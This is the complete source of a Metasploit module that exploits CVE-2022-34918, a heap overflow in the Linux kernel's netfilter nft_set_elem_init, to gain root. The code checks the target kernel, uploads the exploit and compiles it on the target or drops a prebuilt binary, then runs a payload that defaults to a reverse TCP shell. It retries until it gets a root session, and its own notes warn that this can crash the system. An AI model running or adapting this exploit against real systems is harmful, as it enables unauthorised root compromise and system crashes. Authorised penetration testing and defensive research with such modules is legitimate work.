Netfilter nft_set_elem_init Heap Overflow Privilege Escalation

`# frozen_string_literal: true  
  
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = GreatRanking  
include Msf::Post::Common  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Post::Linux::Kernel  
include Msf::Post::Linux::Compile  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation',  
'Description' => %q{  
An issue was discovered in the Linux kernel through 5.18.9.  
A type confusion bug in nft_set_elem_init (leading to a buffer overflow)  
could be used by a local attacker to escalate privileges.  
The attacker can obtain root access, but must start with an unprivileged  
user namespace to obtain CAP_NET_ADMIN access.  
The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC  
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates  
],  
'DisclosureDate' => '2022-02-07',  
'Platform' => 'linux',  
'Arch' => [ARCH_X64],  
'SessionTypes' => %w[meterpreter shell],  
'DefaultOptions' => {  
'Payload' => 'linux/x64/shell_reverse_tcp',  
'PrependSetresuid' => true,  
'PrependSetresgid' => true,  
'PrependFork' => true,  
'WfsDelay' => 30  
},  
'Targets' => [['Auto', {}]],  
'DefaultTarget' => 0,  
'Notes' => {  
'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes.  
'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted.  
'SideEffects' => [ARTIFACTS_ON_DISK]  
},  
'References' => [  
['CVE', '2022-34918'],  
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'],  
['URL', 'https://ubuntu.com/security/CVE-2022-34918'],  
['URL', 'https://www.randorisec.fr/crack-linux-firewall/'],  
['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC']  
]  
)  
)  
  
register_options(  
[  
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]),  
OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5])  
]  
)  
  
register_advanced_options(  
[  
OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp'])  
]  
)  
end  
  
def base_dir  
datastore['WritableDir']  
end  
  
def upload_exploit_binary  
@executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))  
upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf'))  
register_file_for_cleanup(@executable_path)  
end  
  
def upload_payload_binary  
@payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))  
upload_and_chmodx(@payload_path, generate_payload_exe)  
register_file_for_cleanup(@payload_path)  
end  
  
def upload_source  
@exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10))  
mkdir(@exploit_source_path)  
register_dir_for_cleanup(@exploit_source_path)  
dirs = [ '.' ]  
until dirs.empty?  
current_dir = dirs.pop  
dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir)  
Dir.entries(dir_full_path).each do |ent|  
next if ent == '.' || ent == '..'  
  
full_path_host = ::File.join(dir_full_path, ent)  
relative_path = ::File.join(current_dir, ent)  
full_path_target = ::File.join(@exploit_source_path, current_dir, ent)  
if File.file?(full_path_host)  
vprint_status("Uploading #{relative_path} to #{full_path_target}")  
upload_file(full_path_target, full_path_host)  
elsif File.directory?(full_path_host)  
vprint_status("Creating the directory #{full_path_target}")  
mkdir(full_path_target)  
dirs.push(relative_path)  
else  
print_error("#{full_path_host} doesn't look like a file or a directory")  
end  
end  
end  
end  
  
def compile_source  
fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make')  
info = cmd_exec("make -C #{@exploit_source_path}")  
vprint_status(info)  
@executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf')  
if exists?(@executable_path)  
chmod(@executable_path, 0o700) unless executable?(@executable_path)  
print_good('Compilation was successful')  
else  
fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)')  
end  
end  
  
def run_payload  
success = false  
1.upto(datastore['MAX_TRIES']) do |i|  
vprint_status "Execution attempt ##{i}"  
info = cmd_exec(@executable_path, @payload_path)  
info.each_line do |line|  
vprint_status(line.chomp)  
end  
if session_created?  
success = true  
break  
end  
sleep 3  
end  
if success  
print_good('A session has been created')  
else  
print_bad('Exploit has failed')  
end  
end  
  
def get_external_source_code(cve, file)  
file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}")  
::File.binread(file_path)  
end  
  
def module_check  
release = kernel_release  
version = "#{release} #{kernel_version.split(' ').first}"  
ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first  
ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten  
if ubuntu_kernels.empty?  
fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.')  
end  
fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version)  
  
fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir)  
fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp')  
  
if is_root?  
fail_with(Failure::BadConfig, 'Session already has root privileges.')  
end  
end  
  
def check  
config = kernel_config  
  
return CheckCode::Unknown('Could not retrieve kernel config') if config.nil?  
  
return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y')  
  
return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled?  
  
return CheckCode::Safe('LKRG is installed') if lkrg_installed?  
  
arch = kernel_hardware  
  
return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64')  
  
release = kernel_release  
  
version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures  
if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i)  
return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version")  
end  
  
CheckCode::Safe  
end  
  
def exploit  
module_check unless datastore['ForceExploit']  
  
if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make'))  
print_status('Uploading the exploit source code')  
upload_source  
print_status('Compiling the exploit source code')  
compile_source  
else  
print_status('Dropping pre-compiled binaries to system...')  
upload_exploit_binary  
end  
print_status('Uploading payload...')  
upload_payload_binary  
print_status('Running payload on remote system...')  
run_payload  
end  
end  
`